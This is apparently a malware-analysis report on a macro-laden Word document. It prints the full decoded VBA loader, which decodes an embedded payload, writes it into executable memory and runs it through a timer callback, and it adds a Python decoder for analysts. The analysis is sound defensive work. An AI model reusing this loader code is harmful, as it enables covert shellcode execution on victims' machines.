Verdict: MALICIOUS
Risk score: 110

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
ClamAV classifies the file with a downloader signature (Doc.Downloader.Macro-6539595-0), and the document carries a Document_Open macro, so code runs as soon as the document is opened with macros enabled. The decoded VBA shows the mechanism, not just the intent. Document_Open calls charronia, which reads a 7,844-character string (Right(morceau, 7844)) from a control on the dalmatia UserForm, decodes it with deckle.associationism (4 is subtracted from every even-indexed byte and 3 from every odd-indexed byte, then a standard base64 decode over the alphabet that dynamite() builds), and hands the result to amidst. amidst allocates an RWX region with NtAllocateVirtualMemory (ProcessHandle -1, RegionSize 9418, AllocationType 4096 = MEM_COMMIT, Protect 64 = PAGE_EXECUTE_READWRITE), uses ZwWriteVirtualMemory first to read the decoded string's data pointer out of its Variant and then to copy 5,883 decoded bytes into the new region, and charronia finally executes them by registering a CreateTimerQueueTimer callback at base+2064 (64-bit branch) or base+4240 (32-bit branch) with TimerQueue, Parameter, DueTime, Period and Flags all 0, so the callback fires immediately on a thread-pool thread. Two conditional-compilation branches carry PtrSafe/LongPtr declarations for 64-bit Office and Long declarations for 32-bit Office. Obfuscation is light but deliberate: the Win32 imports are declared under random aliases with a trailing space in the Lib name ("ntdll ", "Shlwapi ") to defeat naive string matching, every integer constant is hidden in arithmetic padding (56 - 58 + 4098 = 4096), the Pmt statements and the MyTestArray and range procedures are filler, and the SleepConditionVariableSRW, AcquireSRWLockShared and GetOverlappedResult declarations are never called. The downloader label describes what the shellcode is expected to do next; what this static analysis shows is in-process shellcode execution, and any second-stage fetch would happen inside that shellcode rather than in VBA.
Heuristics (5)

- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0.
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): long run of 0x40 bytes.

Disassembly (attempted x86 opcode disassembly of the run starting at file offset 0x180D):
0000180D 40 inc eax
0000180E 40 inc eax
0000180F 40 inc eax
... (96 consecutive 0x40 bytes, every one decoding as inc eax, through 0000186C)
0000186C 40 inc eax

Caveat: the payload this document actually executes is stored as shifted base64 text in a UserForm control and only becomes machine code after the macro decodes it, so this raw run of 0x40 bytes in the OLE container is not the executed shellcode. A run of 0x40 decodes as inc eax only in 32-bit mode; in 64-bit mode 0x40 is a REX prefix. Treat this heuristic as corroborating evidence at most.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): document contains VBA macro code.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script: "Private Sub Document_Open()" and "Dim milliradian As String".
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  All four are XMP/RDF namespace identifiers from embedded image metadata, not network destinations. The decoded macro source contains no URL; any network activity would originate from the decoded shellcode, which this static analysis does not cover.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13810 bytes |

SHA-256 (macros.bas): a03f6e9b6feac72667c7b0003ae98de513c56f220159c5c3791fd9b8da789fe2

Preview script: first 1,000 lines of the extracted script. The listing contains three modules: ThisDocument (Document_Open, the charronia driver, the injection helpers amidst/assyriology/attrition, and tutorial filler such as MyTestArray), deckle (the Win32 Declare statements under random aliases, the associationism base64 decoder, dynamite, churl), and dalmatia (a UserForm whose attributes are listed but whose control holds the encoded payload; that string is not part of the extracted source). The code is reproduced as carved, without edits, so that it matches the SHA-256 above.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub MyTestArray()
Dim myArray(1 To 4) As String ' Declaring array and setting bounds
Dim Response As String
Dim i As Integer
Dim myFlag As Boolean
myFlag = False
myArray(1) = "A"
myArray(2) = "B"
myArray(3) = "C"
myArray(4) = "D"
Do Until myFlag = True
Response = InputBox("Please enter your choice: (i.e. A,B,C or D)")
For i = 1 To 4
If UCase(Response) = UCase(myArray(i)) Then
myFlag = True: Exit For
End If
Next i
Loop
End Sub
Sub charronia()
Dim elongation As Long
Dim aft As Variant
dalmatia.convivial.Value = Day(#12/5/2013#)
varday = coagulate = susurrant
bay = dracunculus
lentor = "cairina"
blossoming = "asia"
nonequivalence = qucksands
functionalism = "agropyron"
windy = "infuse"
snob = "kibitka"
Set immesh = dalmatia.convivial.SelectedItem
cur = 30 + 20
Pmt 0, cur, 31994, 42250, 5
morceau = immesh.Name
adelgidae = 42 - 89 + 7891
lemures = Right(morceau, adelgidae)
lyricality = deckle.associationism(lemures)
anaglyphy = 6 + 35
Pmt 0, anaglyphy, 26684, 37632, 7
asclepiad = "evaluator"
#If (8 - 86 + 478 + 32 - 14 + 282) > ((47 - 35 + 308) - (30 - 48 + 558) * 1) And ((71 - 50 + 7) - (120 - 79 - 13)) * 2 < (Win64) Then
Dim blessed As String
Dim pharmacological As LongPtr
Dim connate As LongPtr
Dim quilck As Integer
#ElseIf (69 - 99 + 430 + 117 - 58 + 241) > ((77 - 10 + 253) - (23 - 41 + 558) * 1) And Not ((112 - 116 + 32) - (77 - 90 + 41)) * 2 < (Win64) Then
Dim moneybag As Byte
Dim connate As Long
Dim meshes As String
Dim pharmacological As Long
#End If
bomber = 121 - 46 - 75
ferociously = "certifiable"
annalistic = 44 - 12 + 4064
enology = 48 + 10
Pmt 0, enology, 6000, 59593, 3
briarwood = "scrambling"
bey = "retrospection"
mawworm = buckshee
casuarinaceae = 26 + 47
Pmt 0, casuarinaceae, 2847, 52052, 8
vadium = lyricality
diaphragm = "pettily"
pharmacological = amidst(vadium)
inclination = acrobatic
extrinsicality = "acheta"
#If (64 - 77 + 413 + 20 - 118 + 398) > ((114 - 47 + 253) - (27 - 114 + 627) * 1) And ((32 - 106 + 102) - (23 - 116 + 121)) * 2 < (Win64) Then
Dim consols As Byte
Dim disapproving As LongPtr
Dim pretense As LongPtr
Dim abbreviate As LongPtr
milliary = 55 - 90 + 2099
#ElseIf (23 - 1 + 378 + 73 - 53 + 280) > ((50 - 88 + 358) - (12 - 56 + 584) * 1) And Not ((124 - 67 - 29) - (117 - 127 + 38)) * 2 < (Win64) Then
Dim disapproving As Long
greenockite = 42 - 17 + 756
Dim pretense As Long
Dim abbreviate As Long
milliary = greenockite + 3459
#End If
Dim committeewoman As Variant
Dim oppositeness As Variant
disapproving = 36 - 15 - 21
connate = pharmacological + milliary
pretense = 108 - 21 + 201440
abbreviate = 58 - 71 + 3513
archenteron = headlike(pretense, disapproving, connate, disapproving, disapproving, disapproving, disapproving)
silicle = 8 + 12
Pmt 0, silicle, 34176, 40946, 8
End Sub
Private Sub Document_Open()
Dim milliradian As String
Dim pace As Integer
seventies = "barrage"
charronia
janissary = 20 + 2
Pmt 0, janissary, 36851, 50656, 4
End Sub
Function assyriology(anaphase, propitiation, illdisposed)
Dim botanic As Long
Dim parana As Byte
Dim parrotfish As LongPtr
Dim mastermind As LongPtr
Dim polaroid As LongPtr
Dim inquiringly As Byte
Dim enterprising As LongPtr
Dim beeswax As LongPtr
complicity = complicity And 58
mensongesfrench = erignathus
mastermind = anaphase
beeswax = illdisposed
seditions = Math.Round(315)
enterprising = propitiation
sanative = 31 + 13
Pmt 0, sanative, 17927, 41448, 5
seditions = Fix(418)
parrotfish = 100 - 22 - 79
callionymidae ByVal parrotfish, _
mastermind, _
enterprising, beeswax, _
polaroid
mensongesfrench = erignathus
End Function
Function amidst(athelstan)
Dim holster As String
Dim mendicity As String
Dim comparatively As String
Dim cornmeal As Variant
#If (46 - 44 + 398 + 95 - 7 + 212) > ((52 - 113 + 381) - (25 - 95 + 610) * 1) And ((76 - 71 + 23) - (43 - 13 - 2)) * 2 < (Win64) Then
Dim isogram As Integer
Dim greasewood As LongPtr
allograph = 11 - 20 + 17
Dim superbug As LongPtr
Dim eyespot As Integer
Dim auspicium As Integer
Dim chimera As LongPtr
Dim marches As String
bunion = VarPtr(greasewood)
odylic = assyriology(bunion, VarPtr(athelstan) + (2 - 111 + 117), allograph)
#ElseIf (17 - 77 + 460 + 74 - 52 + 278) > ((96 - 71 + 295) - (82 - 32 + 490) * 1) And Not ((9 - 16 + 35) - (62 - 9 - 25)) * 2 < (Win64) Then
Dim greasewood As Long
allograph = 10 - 45 + 39
Dim superbug As Long
Dim chimera As Long
bunion = VarPtr(greasewood)
odylic = attrition(bunion, VarPtr(athelstan) + (15 - 72 + 65), allograph)
#End If
donnybrook = 28 - 67 + 38
superbug = 44 - 59 + 15
darwinism = 53 - 62 + 9
chimera = 127 - 83 + 9374
plutocracy = 56 - 58 + 4098
overpayment = 108 - 77 + 33
delf = lessen(ByVal donnybrook, _
superbug, ByVal darwinism, chimera, ByVal plutocracy, _
ByVal overpayment)
seditions = Math.Round(185)
complicity = Rnd(313)
#If (40 - 18 + 378 + 25 - 127 + 402) > ((29 - 7 + 298) - (2 - 76 + 614) * 1) And ((22 - 107 + 113) - (83 - 103 + 48)) * 2 < (Win64) Then
incrassation = assyriology(superbug, greasewood, 108 - 83 + 5858)
#ElseIf (119 - 15 + 296 + 47 - 27 + 280) > ((112 - 114 + 322) - (8 - 17 + 549) * 1) And Not ((91 - 83 + 20) - (50 - 14 - 8)) * 2 < (Win64) Then
caliban = attrition(superbug, greasewood, 35 - 113 + 5961)
#End If
neohygrophorus = 60 + 7
Pmt 0, neohygrophorus, 13682, 12639, 5
amidst = superbug
End Function
Function attrition(hypermarket, theosophy, bushman)
Dim indefiniteness As Long
Dim argasidae As String
Dim macaw As Long
Dim epoch As String
Dim palmales As Long
Dim beret As Integer
Dim amitotic As Long
Dim grumous As Long
Dim patrol As Long
Dim interplanetary As Byte
Dim misocainea As Long
mensongesfrench = mensongesfrench
mensongesfrench = mensongesfrench
indefiniteness = hypermarket
patrol = bushman
erignathus = "lichenes"
palmales = theosophy
sugarloaf = 15 + 40
Pmt 0, sugarloaf, 6903, 50808, 2
complicity = Fix(179)
macaw = 43 - 49 + 5
callionymidae ByVal macaw, indefiniteness, palmales, patrol, amitotic
unrepining = seditions / 375
End Function
Attribute VB_Name = "deckle"
#If (117 - 114 + 397 + 103 - 102 + 299) > ((105 - 93 + 308) - (45 - 50 + 545) * 1) And ((67 - 21 - 18) - (117 - 58 - 31)) * 2 < (Win64) Then
Public Declare PtrSafe Function headlike _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (manubrium As Any, ByVal arbiter As Any, ByVal panhellenic As Any, ByVal primed As Any, ByVal avulso As Any, ByVal blessed As Any, ByVal loner As Any) As Long
Public Declare PtrSafe Function lessen _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (cushcush As LongPtr, erebus As LongPtr, ByVal annis As LongPtr,hydrasByVal As LongPtr, magsman As LongPtr, ByVal closeness As LongPtr) As LongPtr
Public Declare PtrSafe Function amphibolite _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal placement As Any, beating As Any, past As Any, oleandraceae As Any) As LongPtr
Public Declare PtrSafe Function grog _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (burrlike As Any) As LongPtr
Public Declare PtrSafe Function ashcan _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal biliary As Any, byre As Any, obsequious As Any, glissade As Any) As LongPtr
Public Declare PtrSafe Function callionymidae _
Lib "ntdll " Alias _
"ZwWriteVirtualMemory" (ByVal caesura As Any, ByVal ginger As Any, ByVal coreference As Any, ByVal akin As Any, ByVal fieriness As Any) As LongPtr
#ElseIf (120 - 84 + 364 + 27 - 69 + 342) > ((63 - 93 + 350) - (22 - 74 + 592) * 1) And Not ((120 - 108 + 16) - (62 - 25 - 9)) * 2 < (Win64) Then
Public Declare Function headlike _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (mounting As Any, ByVal trouvere As Any, ByVal catachrestic As Any, ByVal describe As Any, ByVal abstract As Any, ByVal biflagellate As Any, ByVal bisquit As Any) As Long
Public Declare Function oleandra _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (seeking As Any) As Long
Public Declare Function callionymidae _
Lib "ntdll " Alias _
"ZwWriteVirtualMemory" (ByVal effortlessly As Any, ByVal protoplasm As Any, ByVal crustose As Any, ByVal carthusian As Any, ByVal compensation As Any) As Long
Public Declare Function boatswain _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal cusp As Any, lens As Any, superannuated As Any, shorn As Any) As Long
Public Declare Function hideaway _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal dad As Any, spectrometric As Any, betulaceous As Any, duplicature As Any) As Long
Public Declare Function lessen _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (geotropism As Long, lubricity As Long, ByVal discontentment As Long, hypoactiveByVal As Long, regulate As Long, ByVal missile As Long) As Long
#End If
Function associationism(strawboard) As String
Dim scours As Long
Dim telephotography As String
complicity = Math.Round(227)
Dim sociologically As Long
Dim abnormalize(6962) As Byte
Dim chyle As Long
Dim chrism() As Byte
Dim chorizagrotis(63) As Long
Dim brat As Integer
Dim macaire(63) As Long
Dim gentlemanly As Long
Dim currishly(63) As Long
endlessly = 34 - 36 + 16711682
whiffletree = 100 - 35 - 1
Dim bel As Variant
bloodyminded = 86 - 72 + 4082
bazeingr = 57 - 40 + 65519
jhuth = 91 - 91 + 262144
cashew = 22 - 71 + 258097
vesalius = 3 - 106 + 166
been = 106 - 24 + 16514990
Dim fidus As Byte
nati = 99 - 20 + 177
prepubescent = 46 - 23 + 4009
Dim lightsomeness As Long
nozzle = 78 - 34 + 65236
corollary = 37 - 49 + 267
Dim sublimity As Long
delilah = 8 - 65 + 7900
Dim abrasion() As Byte
abrasion = VBA.StrConv(strawboard, 120 + 8)
paraboloid = 44 + 55
Pmt 0, paraboloid, 5934, 30053, 2
circularknit = 7843
madwoman = vbKeyShift - 12
For unaligned = 0 To circularknit
If unaligned Mod 2 = 0 Then
abrasion(unaligned) = abrasion(unaligned) - madwoman
Else
abrasion(unaligned) = abrasion(unaligned) - (madwoman - 1)
End If
Next unaligned
monistic = 24 + 6
Pmt 0, monistic, 19309, 35586, 7
brat = 0
amah = dynamite
For chyle = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
currishly(chyle) = churl(chyle, whiffletree, 49)
chorizagrotis(chyle) = churl(chyle, bloodyminded, 49)
macaire(chyle) = churl(chyle, jhuth, 49)
Next chyle
faithless = 31 + 2
Pmt 0, faithless, 4128, 38197, 6
chrism = abrasion
branchiopod = 76 - 94 + 22
bottomland = 45 + 24
Pmt 0, bottomland, 9912, 41348, 8
backhand = 73 - 88 + 18
unrepining = complicity - 177
mensongesfrench = erignathus
stares = backhand + 1
hyperborean = 11 - 39 + 30
For scours = 0 To circularknit
edible = chrism(scours)
balbriggan = chrism(scours + 2)
cloudy = chorizagrotis(amah(chrism(scours + 1)))
musketry = currishly(amah(balbriggan)) + amah(chrism(scours + backhand))
sociologically = macaire(amah(edible)) + cloudy + musketry
chyle = churl(sociologically, endlessly, 41)
abnormalize(gentlemanly) = churl(chyle, bazeingr, 31)
chyle = churl(sociologically, nozzle, 41)
abnormalize(gentlemanly + 1) = churl(chyle, nati, 31)
abnormalize(gentlemanly + hyperborean) = churl(sociologically, corollary, 41)
gentlemanly = gentlemanly + hyperborean + 1
scours = scours + 3
Next
associationism = abnormalize
End Function
Function hypotonic(chops)
hypotonic = AscW(chops)
End Function
Function dynamite()
Dim turfman(255) As Byte
microglia = 38 - 95 + 122
For i = microglia To (16 - 45 + 120)
turfman(microglia) = microglia - (62 - 84 + 87)
microglia = microglia + 1
If (76 - 88 + 103) < microglia Then
airmanship = camisole + 4 - 43 + 104
Exit For
End If
civile = elderberry + 27 - 29 + 67
Next
microglia = (76 - 124 + 96)
For i = microglia To (85 - 41 + 14)
turfman(microglia) = microglia + (104 - 90 - 10)
microglia = microglia + 1
If (53 - 102 + 107) < microglia Then
acariasis = optimism + 81 - 44 + 28
Exit For
End If
infamous = ungentle + 126 - 51 - 10
Next
microglia = (90 - 119 + 126)
For i = microglia To (20 - 46 + 149)
turfman(microglia) = microglia - (91 - 112 + 92)
microglia = microglia + 1
oneirocritic = bigamy + 14 - 14 + 65
If (63 - 35 + 95) < microglia Then
doublebedded = porousness + 99 - 111 + 77
Exit For
End If
beacon = orleanist + 118 - 106 + 53
Next
turfman(106 - 10 - 49) = (50 - 57 + 70)
microglia = (120 - 6 - 71)
turfman(microglia) = (60 - 121 + 123)
dynamite = turfman
End Function
Sub range()
Dim rngFirstList As range
Set rngFirstList = ActiveDocument.Lists(1).range
ActiveDocument.Windows(1).ScrollIntoView Obj:=rngFirstList, Start:=False
rngFirstList.Select
Selection.Collapse Direction:=wdCollapseEnd
Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdMove
End Sub
Function churl(sedativehypnotic, chine, disused)
Select Case disused
Case 31 + (10 / 2 - 5)
churl = sedativehypnotic \ chine
Case 41 + (5 - 3) / 2 - 1
churl = sedativehypnotic And chine
Case 49 + (56 / 7 - 4 * 2)
churl = sedativehypnotic * chine
End Select
End Function
Attribute VB_Name = "dalmatia"
Attribute VB_Base = "0{AB6DF160-CB04-4CB3-9A5A-F90DCC2FC2B7}{101CE94B-4C91-4B50-A705-BD3E3EF1583D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
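As an added example, not code from this report or from the sample, the following Python reproduces the decoding that deckle.associationism performs, folds the arithmetic padding around the API arguments, and maps the obfuscated Declare aliases back to the real exports so an analyst can read the olevba output without hand-tracing every constant. The encoded payload string lives in the dalmatia UserForm control and is not on this page, so the test input is constructed: encode_like_macro is a hypothetical helper that exists only to build it. SAMPLE_VBA is an abridged copy of the page's own Declare statements with the parameter lists shortened, and ALLOC_ARGS holds the literal expressions from amidst() as they appear above.

```python
import ast
import base64
import operator
import re

# Alphabet that the macro's dynamite() builds: 'A'..'Z' -> 0..25, 'a'..'z' -> 26..51,
# '0'..'9' -> 52..61, '+' -> 62, '/' -> 63 (standard base64); anything else -> 0.
B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
B64_TABLE = {ord(c): i for i, c in enumerate(B64_ALPHABET)}


def decode_payload(blob: bytes) -> bytes:
    """Reproduce deckle.associationism(): undo the byte shift, then base64-decode.

    madwoman = vbKeyShift - 12 = 4: the macro subtracts 4 from even-indexed bytes and
    3 from odd-indexed bytes before the table lookup. Like the macro's table, unknown
    characters (including '=' padding) map to 0, so padded input yields trailing NULs.
    """
    shifted = bytes((b - (4 if i % 2 == 0 else 3)) & 0xFF for i, b in enumerate(blob))
    out = bytearray()
    for i in range(0, len(shifted) - 3, 4):
        c0, c1, c2, c3 = (B64_TABLE.get(shifted[i + k], 0) for k in range(4))
        # macaire/chorizagrotis/currishly hold c*262144, c*4096, c*64; churl(..., 49) multiplies.
        v = (c0 << 18) | (c1 << 12) | (c2 << 6) | c3
        # (v And 0xFF0000) \ 65536, (v And 0xFF00) \ 256, v And 0xFF via churl(..., 41/31).
        out += bytes(((v >> 16) & 0xFF, (v >> 8) & 0xFF, v & 0xFF))
    return bytes(out)


def encode_like_macro(payload: bytes) -> bytes:
    """Hypothetical inverse of decode_payload, used only to construct test input."""
    return bytes((c + (4 if i % 2 == 0 else 3)) & 0xFF
                 for i, c in enumerate(base64.b64encode(payload)))


def fold_vba_int(expr: str) -> int:
    """Evaluate the macro's arithmetic padding, e.g. '56 - 58 + 4098' -> 4096.

    Only integer literals with + - * are accepted; names and calls raise ValueError.
    """
    ops = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}

    def ev(n):
        if isinstance(n, ast.Constant) and isinstance(n.value, int):
            return n.value
        if isinstance(n, ast.BinOp) and type(n.op) in ops:
            return ops[type(n.op)](ev(n.left), ev(n.right))
        raise ValueError("not a pure integer expression: %r" % expr)

    return ev(ast.parse(expr, mode="eval").body)


# Literal expressions from amidst() on this page, in NtAllocateVirtualMemory order.
ALLOC_ARGS = {
    "ProcessHandle": "28 - 67 + 38",     # donnybrook: -1 == GetCurrentProcess()
    "ZeroBits": "53 - 62 + 9",           # darwinism
    "RegionSize": "127 - 83 + 9374",     # chimera
    "AllocationType": "56 - 58 + 4098",  # plutocracy: 0x1000 MEM_COMMIT
    "Protect": "108 - 77 + 33",          # overpayment: 0x40 PAGE_EXECUTE_READWRITE
}


def recovered_alloc_args() -> dict:
    """Fold ALLOC_ARGS into the concrete values the macro passes."""
    return {name: fold_vba_int(expr) for name, expr in ALLOC_ARGS.items()}


DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?Function\s+(\w+)\s+Lib\s+"([^"]*)"\s+Alias\s+"([^"]*)"',
    re.IGNORECASE,
)


def resolve_declares(vba: str) -> dict:
    """Map each Declare alias to its DLL and real export, and flag whether it is ever called.

    A trailing space in the Lib name ("ntdll ") is recorded because it is an evasion
    against exact-string matching on the DLL name.
    """
    src = re.sub(r"\s+_\r?\n\s*", " ", vba)  # join VBA line continuations
    result = {}
    for alias, dll, export in DECLARE_RE.findall(src):
        uses = len(re.findall(r"\b%s\b" % re.escape(alias), src))
        declares = len(re.findall(r"Function\s+%s\s+Lib" % re.escape(alias), src, re.IGNORECASE))
        result[alias] = {
            "dll": dll,
            "export": export,
            "called": uses > declares,
            "dll_has_trailing_space": dll != dll.rstrip(),
        }
    return result


# Abridged from the page's extracted macro (parameter lists shortened); constructed input.
SAMPLE_VBA = '''Public Declare PtrSafe Function headlike _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (manubrium As Any, ByVal arbiter As Any) As Long
Public Declare PtrSafe Function lessen _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (cushcush As LongPtr, erebus As LongPtr) As LongPtr
Public Declare PtrSafe Function amphibolite _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal placement As Any) As LongPtr
Function amidst(athelstan)
delf = lessen(ByVal donnybrook, superbug)
archenteron = headlike(pretense, disapproving)
End Function
'''

if __name__ == "__main__":
    print(recovered_alloc_args())
    for alias, info in resolve_declares(SAMPLE_VBA).items():
        print(alias, "->", info)
    print(decode_payload(encode_like_macro(b"\x90\x90\xcc")))
```

To use this on a real sample, extract the control's string from the dalmatia UserForm (olevba does not include form control text; oledump or a form-stream parser will), take its last 7,844 characters as the macro's Right() call does, and pass the bytes to decode_payload; the shellcode entry is then at offset 2064 (64-bit) or 4240 (32-bit) of the result, which is where CreateTimerQueueTimer's callback points.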